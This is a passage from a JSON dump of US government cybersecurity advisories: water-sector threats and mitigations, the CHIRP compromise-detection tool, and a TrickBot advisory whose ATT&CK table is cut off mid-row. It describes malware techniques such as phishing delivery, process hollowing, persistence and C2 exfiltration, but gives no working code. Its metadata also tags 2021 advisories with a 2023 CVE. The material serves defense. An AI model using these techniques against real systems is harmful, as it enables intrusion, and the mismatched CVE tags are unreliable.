described in the Recommended Mitigations section of this advisory.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Threat Overview\n\n#### Tactics, Techniques, and Procedures\n\nWWS facilities may be vulnerable to the following common tactics, techniques, and procedures (TTPs) used by threat actors to compromise IT and OT networks, systems, and devices.\n\n * Spearphishing personnel to deliver malicious payloads, including ransomware [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566/>)]. \n * Spearphishing is one of the most prevalent techniques used for initial access to IT networks. Personnel and their potential lack of cyber awareness are a vulnerability within an organization. Personnel may open malicious attachments or links to execute malicious payloads contained in emails from threat actors that have successfully bypassed email filtering controls.\n * When organizations integrate IT with OT systems, attackers can gain access\u2014either purposefully or inadvertently\u2014to OT assets after the IT network has been compromised through spearphishing and other techniques.\n * Exploitation of internet-connected services and applications that enable remote access to WWS networks [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210/>)]. \n * For example, threat actors can exploit a Remote Desktop Protocol (RDP) that is insecurely connected to the internet to infect a network with ransomware. If the RDP is used for process control equipment, the attacker could also compromise WWS operations. Note: the increased use of remote operations due to the COVID-19 pandemic has likely increased the prevalence of weaknesses associated with remote access.\n * Exploitation of unsupported or outdated operating systems and software. \n * Threat actors likely seek to take advantage of perceived weaknesses among organizations that either do not have\u2014or choose not to prioritize\u2014resources for IT/OT infrastructure modernization. WWS facilities tend to allocate resources to physical infrastructure in need of replacement or repair (e.g., pipes) rather than IT/OT infrastructure.\n * The fact that WWS facilities are inconsistently resourced municipal systems\u2014not all of which have the resources to employ consistently high cybersecurity standards\u2014may contribute to the use of unsupported or outdated operating systems and software.\n * Exploitation of control system devices with vulnerable firmware versions. \n * WWS systems commonly use outdated control system devices or firmware versions, which expose WWS networks to publicly accessible and remotely executable vulnerabilities. Successful compromise of these devices may lead to loss of system control, denial of service, or loss of sensitive data [[T0827](<https://collaborate.mitre.org/attackics/index.php/Technique/T0827>)].\n\n#### WWS Sector Cyber Intrusions\n\nCyber intrusions targeting U.S. WWS facilities highlight vulnerabilities associated with the following threats:\n\n * Insider threats, from current or former employees who maintain improperly active credentials\n * Ransomware attacks\n\nWWS Sector cyber intrusions from 2019 to early 2021 include:\n\n * In August 2021, malicious cyber actors used Ghost variant ransomware against a California-based WWS facility. The ransomware variant had been in the system for about a month and was discovered when three supervisory control and data acquisition (SCADA) servers displayed a ransomware message.\n * In July 2021, cyber actors used remote access to introduce ZuCaNo ransomware onto a Maine-based WWS facility\u2019s wastewater SCADA computer. The treatment system was run manually until the SCADA computer was restored using local control and more frequent operator rounds.\n * In March 2021, cyber actors used an unknown ransomware variant against a Nevada-based WWS facility. The ransomware affected the victim\u2019s SCADA system and backup systems. The SCADA system provides visibility and monitoring but is not a full industrial control system (ICS).\n * In September 2020, personnel at a New Jersey-based WWS facility discovered potential Makop ransomware had compromised files within their system.\n * In March 2019, a former employee at Kansas-based WWS facility unsuccessfully attempted to threaten drinking water safety by using his user credentials, which had not been revoked at the time of his resignation, to remotely access a facility computer.\n\n### Mitigations\n\nThe FBI, CISA, EPA, and NSA recommend WWS facilities\u2014including DoD water treatment facilities in the United States and abroad\u2014use a risk-informed analysis to determine the applicability of a range of technical and non-technical mitigations to prevent, detect, and respond to cyber threats.\n\n#### WWS Monitoring\n\nPersonnel responsible for monitoring WWS should check for the following suspicious activities and indicators, which may be indicative of threat actor activity:\n\n * Inability of WWS facility personnel to access SCADA system controls at any time, either entirely or in part;\n * Unfamiliar data windows or system alerts appearing on SCADA system controls and facility data screens that could indicate a ransomware attack;\n * Detection by SCADA system controls, or by water treatment personnel, of abnormal operating parameters\u2014such as unusually high chemical addition rates\u2014used in the safe and proper treatment of drinking water;\n * Access of SCADA systems by unauthorized individuals or groups, e.g., former employees and current employees not authorized/assigned to operate SCADA systems and controls.\n * Access of SCADA systems at unusual times, which may indicate that a legitimate user\u2019s credentials have been compromised\n * Unexplained SCADA system restarts.\n * Unchanging parameter values that normally fluctuate.\n\n#### Remote Access Mitigations\n\nNote: The increased use of remote operations due to the COVID-19 pandemic increases the necessity for asset owner-operators to assess the risk associated with enhanced remote access to ensure it falls within acceptable levels. \n\n * Require multi-factor authentication for all remote access to the OT network, including from the IT network and external networks.\n * Utilize [blocklisting and allowlisting](<https://csrc.nist.gov/News/2015/NIST-Release-of-SP-800-167,-Guide-to-Application-W>) to limit remote access to users with a verified business and/or operational need.\n * Ensure that all remote access technologies have logging enabled and regularly audit these logs to identify instances of unauthorized access.\n * Utilize manual start and stop features in place of always activated unattended access to reduce the time remote access services are running.\n * Audit networks for systems using remote access services. \n * Close unneeded network ports associated with remote access services (e.g., RDP \u2013 Transmission Control Protocol [TCP] Port 3389).\n * When configuring [access control for a host](<https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final>), utilize custom settings to limit the access a remote party can attempt to acquire.\n\n#### Network Mitigations\n\n * Implement and ensure robust network segmentation between IT and OT networks to limit the ability of malicious cyber actors to pivot to the OT network after compromising the IT network. \n * Implement demilitarized zones (DMZs), firewalls, jump servers, and one-way communication diodes to prevent unregulated communication between the IT and OT networks.\n * Develop/update network maps to ensure a full accounting of all equipment that is connected to the network. \n * Remove any equipment from networks that is not required to conduct operations to reduce the attack surface malicious actors can exploit. \n\n#### Planning and Operational Mitigations\n\n * Ensure the organization\u2019s emergency response plan considers the full range of potential impacts that cyberattacks pose to operations, including loss or manipulation of view, loss or manipulation of control, and threats to safety. \n * The plan should also consider third parties with legitimate need for OT network access, including engineers and vendors.\n * Review, test, and update the emergency response plan on an annual basis to ensure accuracy.\n * Exercise the ability to fail over to alternate control systems, including manual operation while assuming degraded electronic communications.\n * Allow employees to gain decision-making experience via [tabletop exercises ](<https://www.cisa.gov/publication/cybersecurity-scenarios>)that incorporate loss of visibility and control scenarios. Utilize resources such as the Environment Protection Agency\u2019s (EPA) [Cybersecurity Incident Action Checklist](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>) as well as the Ransomware Response Checklist on p. 11 of the [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).\n\n#### Safety System Mitigations\n\n * Install independent cyber-physical safety systems. These are systems that physically prevent dangerous conditions from occurring if the control system is compromised by a threat actor. \n * Examples of cyber-physical safety system controls include: \n * Size of the chemical feed pump\n * Gearing on valves\n * Pressure switches, etc.\n * These types of controls benefit WWS Sector facilities\u2014especially smaller facilities with limited cybersecurity capability\u2014because they enable facility staff to assess systems from a worst-case scenario and determine protective solutions. Enabling cyber-physical safety systems allows operators to take physical steps to limit the damage, for example, by preventing cyber actors, who have gained control of a sodium hydroxide pump, from raising the pH to dangerous levels.\n\n### Additional Mitigations\n\n * Foster an organizational culture of cyber readiness. See the [CISA Cyber Essentials](<https://www.cisa.gov/publication/cyber-essentials-toolkits>) along with the items listed in the Resources section below for guidance. \n * Update software, including operating systems, applications, and firmware on IT network assets. Use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program. Consider using a centralized patch management system.\n * Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware. \n * Implement regular data backup procedures on both the IT and OT networks. \n * Regularly test backups.\n * Ensure backups are not connected to the network to prevent the potential spread of ransomware to the backups.\n * When possible, enable OT device authentication, utilize the encrypted version of OT protocols, and encrypt all wireless communications to ensure the confidentiality and authenticity of process control data in transit.\n * Employ user account management to: \n * Remove, disable, or rename any default system accounts wherever possible.\n * Implement account lockout policies to reduce risk from brute-force attacks.\n * Monitor the creation of administrator-level accounts by third-party vendors with robust and privileged account management policies and procedures.\n * Implement a user account policy that includes set durations for deactivation and removal of accounts after employees leave the organization or after accounts reach a defined period of inactivity.\n * Implement data execution prevention controls, such as application allowlisting and software restriction policies that prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers.\n * Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of users exhibiting unusual activity.\n\nFBI, CISA, EPA, and NSA would like to thank Dragos as well as the WaterISAC for their contributions to this advisory.\n\n### Resources\n\n#### Cyber Hygiene Services\n\nCISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)\u2014including vulnerability scanning and ransomware readiness assessments\u2014to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. \n\n#### Rewards for Justice Reporting\n\nThe U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ website](<https://rewardsforjustice.net/english/malicious_cyber_activity.html>) for more information and how to report information securely.\n\n#### StopRansomware.gov \n\nThe [StopRansomware.gov](<https://www.cisa.gov/stopransomware>) webpage is an interagency resource that provides guidance on ransomware protection, detection, and response. This includes ransomware alerts, reports, and resources from CISA and other federal partners, including:\n\n * CISA and MS-ISAC: [Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C.pdf>)\n * CISA Insights: [Ransomware Outbreak](<https://www.cisa.gov/blog/2019/08/21/cisa-insights-ransomware-outbreak-0>)\n * CISA Webinar: [Combating Ransomware](<https://www.youtube.com/watch?v=D8kC07tu27A>)\n\n### Additional Resources\n\nFor additional resources that can assist in preventing and mitigating this activity, see:\n\n * FBI-CISA-EPA-MS-ISAC Joint CSA: [Compromise of U.S. Water Treatment Facility](<https://us-cert.cisa.gov/ncas/alerts/aa21-042a>)\n * WaterISAC: [15 Cybersecurity Fundamentals for Water and Wastewater Utilities](<https://www.waterisac.org/fundamentals>)\n * American Water Works Association: [Cybersecurity Guidance and Assessment Tool](<https://www.awwa.org/Resources-Tools/Resource-Topics/Risk-Resilience/Cybersecurity-Guidance>)\n * EPA: [Cybersecurity Incident Action Checklist](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>)\n * EPA: [Cybersecurity Best Practices for the Water Sector](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>)\n * EPA: Supporting Cybersecurity Measures with the [Clean Water](<https://www.epa.gov/cwsrf>) and [Drinking Water](<https://www.epa.gov/dwsrf>) State Revolving Funds\n * CISA: [Cyber Risks &amp; Resources for the Water and Wastewater Systems Sector](<https://www.cisa.gov/ncf-water>) infographic\n * CISA: [Critical ICS Cybersecurity Performance Goals and Objectives](<https://www.cisa.gov/control-systems-goals-and-objectives>)\n * CISA Fact Sheet: [Rising Ransomware Threat to Operational Technology Assets](<https://www.cisa.gov/publication/ransomware-threat-to-ot>)\n * CISA-MS-ISAC: [Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>)\n * NSA CSA: [Stop Malicious Cyber Activity Against Connected OT](<https://media.defense.gov/2021/Apr/29/2002630479/-1/-1/1/CSA_STOP-MCA-AGAINST-OT_UOO13672321.PDF>)\n * CISA: [Insider Threat Mitigation Resources](<https://www.cisa.gov/publication/insider-threat-mitigation-resources>)\n * NIST: [Special Publication (SP) 800-167, Guide to Application Whitelisting](<https://csrc.nist.gov/News/2015/NIST-Release-of-SP-800-167,-Guide-to-Application-W>)\n * NIST: [SP 800-82 Rev. 2, Guide to Industrial Control Systems (ICS) Security (Section 6.2.1)](<https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final>)\n\n### Disclaimer of Endorsement \n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. \n\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov> \"Email CISA Central\" ).\n\n### Revisions\n\nInitial Version: October 14, 2021|October 25, 2021: Corrected typo in Additional Resources\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2021-10-25T12:00:00", "type": "ics", "title": "Ongoing Cyber Threats to U.S. Water and Wastewater Systems", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2021-10-25T12:00:00", "id": "AA21-287A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-287a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:02:22", "description": "### Summary\n\n_**Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a [statement from the White House](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>). For more information on SolarWinds-related activity, go to <https://us-cert.cisa.gov/remediating-apt-compromised-networks> and <https://www.cisa.gov/supply-chain-compromise>.**_\n\nThis Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts:\n\n * AA20-352A: [Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>), which primarily focuses on an advanced persistent threat (APT) actor\u2019s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations.\n * AA21-008A: [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>), which addresses APT activity within Microsoft 365/Azure environments and offers an overview of\u2014and guidance on\u2014available open-source tools. The Alert includes the [CISA-developed Sparrow tool ](<https://github.com/cisagov/Sparrow>)that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment.\n\nSimilar to [Sparrow](<https://github.com/cisagov/Sparrow>)\u2014which scans for signs of APT compromise within an M365 or Azure environment\u2014CHIRP scans for signs of APT compromise within an on-premises environment.\n\nIn this release, CHIRP, by default, searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A that has spilled into an on-premises enterprise environment.\n\nCHIRP is freely available on the [CISA GitHub Repository](<https://github.com/cisagov>). For additional guidance watch CISA's [CHIRP Overview video](<https://www.youtube.com/watch?v=UGYSNiNOpds>). **Note:** CISA will continue to release plugins and IOC packages for new threats via the CISA GitHub Repository.\n\nCISA advises organizations to use CHIRP to:\n\n * Examine Windows event logs for artifacts associated with this activity;\n * Examine Windows Registry for evidence of intrusion;\n * Query Windows network artifacts; and\n * Apply YARA rules to detect malware, backdoors, or implants.\n\nNetwork defenders should review and confirm any post-compromise threat activity detected by the tool. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf an organization does not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. **Note**: Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n#### How CHIRP Works\n\nCHIRP is a command-line executable with a dynamic plugin and indicator system to search for signs of compromise. CHIRP has plugins to search through event logs and registry keys and run YARA rules to scan for signs of APT tactics, techniques, and procedures. CHIRP also has a YAML file that contains a list of IOCs that CISA associates with the malware and APT activity detailed in CISA Alerts [AA20-352A](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>) and [AA21-008A](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>).\n\nCurrently, the tool looks for:\n\n * The presence of malware identified by security researchers as [TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>) and RAINDROP;\n * Credential dumping certificate pulls;\n * Certain persistence mechanisms identified as associated with this campaign;\n * System, network, and M365 enumeration; and\n * Known observable indicators of lateral movement.\n\nNetwork defenders can follow step-by-step instructions on the [CISA CHIRP GitHub repository](<https://github.com/cisagov/CHIRP>) to add additional IOCs, YARA rules, or plugins to CHIRP to search for post-compromise threat activity related to the SolarWinds Orion supply chain compromise or new threat activity.\n\n#### **Compatibility**\n\nCHIRP currently only scans Windows operating systems.\n\n#### **Instructions**\n\nCHIRP is available on CISA\u2019s GitHub repository in two forms:\n\n 1. A compiled executable\n\n 2. A python script\n\nCISA recommends using the compiled version to easily scan a system for APT activity. For instructions to run, read the README.md in the CHIRP GitHub repository.\n\nIf you choose to use the native Python version, see the detailed instructions on the CHIRP GitHub repository.\n\n### Mitigations\n\n#### Interpreting the Results\n\nCHIRP provides results of its scan in JSON format. CISA encourages uploading the results into a security information and event management (SIEM) system, if available. If no SIEM system is available, results can be viewed in a compatible web browser or text editor. If CHIRP detects any post-compromise threat activity, those detections should be reviewed and confirmed. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf you do not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. **Note:** Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\n#### **Frequently Asked Questions**\n\n 1. **What systems should CHIRP run on?**\n\nSystems running SolarWinds Orion or believed to be involved in any resulting lateral movement.\n\n 2. **What should I do with results?**\n\nIngest the JSON results into a SIEM system, web browser, or text editor.\n\n 3. **Are there existing tools that CHIRP complements and/or provide the same benefit as CHIRP?** \n\n 1. Antivirus software developers may have begun to roll out detections for the SolarWinds post-compromise activity. However, those products can miss historical signs of compromise. CHIRP can provide a complementary benefit to antivirus when run.\n\n 2. CISA previously released the Sparrow tool that scans for APT activity within M365 and Azure environments related to activity detailed in CISA Alerts AA20-352A and AA21-008A. CHIRP provides a complementary capability to Sparrow by scanning for on-premises systems for similar activity.\n\n 4. **How often should I run CHIRP?**\n\nCHIRP can be run once or routinely. Currently, CHIRP does not provide a mechanism to run repeatedly in its native format.\n\n 5. **Do I need to configure the tool before I run it?**\n\nNo.\n\n 6. **Will CHIRP change or affect anything on the system(s) it runs on?**\n\nNo, CHIRP only scans the system(s) it runs on and makes no active changes.\n\n 7. **How long will it take to run CHIRP?**\n\nCHIRP will complete its scan in approximately 1 to 2 hours. Duration will be dependent on the level of activity, the system, and the size of the resident data sets. CHIRP will provide periodic progress updates as it runs.\n\n 8. **If I have questions, who do I contact? **\n\nFor general questions regarding CHIRP, please contact CISA via email at [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov>) or by phone at 1-888-282-0870. For reporting indicators of potential compromise, contact us by submitting a report through our website at <https://us-cert.cisa.gov/report>. For all technical issues or support for CHIRP, please submit issues at the [CISA CHIRP GitHub Repository](<https://github.com/cisagov/CHIRP>). \n\n### Revisions\n\nMarch 18, 2021: Initial Publication |April 9, 2021: Fixed PDF (not related to content)|April 15, 2021: Updated with Attribution Statement\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2021-04-15T12:00:00", "type": "ics", "title": "Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2021-04-15T12:00:00", "id": "AA21-077A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-077a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:02:27", "description": "### Summary\n\n_This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework, Version 8. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot.\n\nTrickBot\u2014first identified in 2016\u2014is a Trojan developed and operated by a sophisticated group of cybercrime actors. Originally designed as a banking Trojan to steal financial data, TrickBot has evolved into highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.\n\nTo secure against TrickBot, CISA and FBI recommend implementing the mitigation measures described in this Joint Cybersecurity Advisory, which include blocking suspicious Internet Protocol addresses, using antivirus software, and providing social engineering and phishing training to employees.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nTrickBot is an advanced Trojan that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links, which\u2014if enabled\u2014execute malware (_Phishing:_ _Spearphishing Attachment _[[T1566.001](<https://attack.mitre.org/versions/v8/techniques/T1566/001/>)], _Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002>)]). CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation. (_User Execution: Malicious Link_ [[T1204.001](<https://attack.mitre.org/versions/v8/techniques/T1204/001/>)], _User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002/>)]). In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically communicates with the malicious actor\u2019s command and control (C2) server to download TrickBot to the victim\u2019s system (_Command and Scripting Interpreter: JavaScript_ [[T1059.007](<https://attack.mitre.org/versions/v8/techniques/T1059/007/>)]).\n\nAttackers can use TrickBot to:\n\n * Drop other malware, such as Ryuk and Conti ransomware, or\n * Serve as an Emotet downloader (_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/versions/v8/techniques/T1105/>)]).[[1](<https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html>)]\n\nTrickBot uses person-in-the-browser attacks to steal information, such as login credentials (_Man in the Browser_ [[T1185](<https://attack.mitre.org/versions/v8/techniques/T1185/>)]). Additionally, some of TrickBot\u2019s modules spread the malware laterally across a network by abusing the Server Message Block (SMB) Protocol. TrickBot operators have a toolset capable of spanning the entirety of the MITRE ATT&amp;CK framework, from actively or passively gathering information that can be used to support targeting (_Reconnaissance _[[TA0043](<https://attack.mitre.org/tactics/TA0043/>)]), to trying to manipulate, interrupt, or destroy systems and data (_Impact _[[TA0040](<https://attack.mitre.org/tactics/TA0040/>)]).\n\nTrickBot is capable of data exfiltration over a hardcoded C2 server, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041/>)], _Resource Hijacking_ [[T1496](<https://attack.mitre.org/versions/v8/techniques/T1496>)], System Information Discovery.[[2](<https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/#background>)] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks.\n\nFigure 1 lays out TrickBot\u2019s use of enterprise techniques.\n\n\n\n_Figure 1: MITRE ATT&amp;CK enterprise techniques used by TrickBot _\n\n### MITRE ATT&amp;CK Techniques\n\nAccording to MITRE, _TrickBot_ [[S0266](<https://attack.mitre.org/software/S0266/>)] uses the ATT&amp;CK techniques listed in table 1.\n\n_Table 1: TrickBot ATT&amp;CK techniques for enterprise_\n\n_Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v8/tactics/TA0001/>)]\n\n**Technique Title**\n\n| **ID** | **Use** \n---|---|--- \nPhishing: Spearphishing Attachment | [T1566.001](<https://attack.mitre.org/versions/v8/techniques/T1566/001/>) | TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware. \nPhishing: Spearphishing Link | [T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002>) | \n\nTrickBot has been delivered via malicious links in phishing emails. \n \n_Execution_ [[TA0002](<https://attack.mitre.org/versions/v8/tactics/TA0002/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. \nCommand and Scripting Interpreter: Windows Command Shell | [T1059.003](<https://attack.mitre.org/versions/v8/techniques/T1059/003/>) | TrickBot has used macros in Excel documents to download and deploy the malware on the user\u2019s machine. \nCommand and Scripting Interpreter: JavaScript/JScript | [T1059.007](<https://attack.mitre.org/versions/v8/techniques/T1059/007/>) | TrickBot victims unknowingly download a malicious JavaScript file that, when opened, automatically communicates with the malicious actor\u2019s C2 server to download TrickBot to the victim\u2019s system. \nNative API | [T1106](<https://attack.mitre.org/versions/v8/techniques/T1106>) | TrickBot uses the Windows Application Programming Interface (API) call, CreateProcessW(), to manage execution flow. \nUser Execution: Malicious Link | [T1204.001](<https://attack.mitre.org/versions/v8/techniques/T1204/001/>) | TrickBot has sent spearphishing emails in an attempt to lure users to click on a malicious link. \nUser Execution: Malicious File | [T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002/>) | TrickBot has attempted to get users to launch malicious documents to deliver its payload. \n \n_Persistence_ [[TA0003](<https://attack.mitre.org/versions/v8/tactics/TA0003/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. \nCreate or Modify System Process: Windows Service | [T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003/>) | TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots. \n \n_Privilege Escalation _[[TA0004](<https://attack.mitre.org/versions/v8/tactics/TA0004/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. \nProcess Injection: Process Hollowing | [T1055.012](<https://attack.mitre.org/versions/v8/techniques/T1055/012/>) | TrickBot injects into the svchost.exe process. \nCreate or Modify System Process: Windows Service | [T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003/>) | TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots. \n \n_Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v8/tactics/TA0005/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nObfuscated Files or Information | [T1027](<https://attack.mitre.org/versions/v8/techniques/T1027>) | TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files. \nObfuscated Files or Information: Software Packing | [T1027.002](<https://attack.mitre.org/versions/v8/techniques/T1027/002/>) | TrickBot leverages a custom packer to obfuscate its functionality. \nMasquerading | [T1036](<https://attack.mitre.org/versions/v8/techniques/T1036>) | The TrickBot downloader has used an icon to appear as a Microsoft Word document. \nProcess Injection: Process Hollowing | [T1055.012](<https://attack.mitre.org/versions/v8/techniques/T1055/012/>) | TrickBot injects into the svchost.exe process. \nModify Registry | [T1112](<https://attack.mitre.org/versions/v8/techniques/T1112/>) | TrickBot can modify registry entries. \nDeobfuscate/Decode Files or Information | [T1140](<https://attack.mitre.org/versions/v8/techniques/T1140>) | TrickBot decodes the configuration data and modules. \nSubvert Trust Controls: Code Signing | 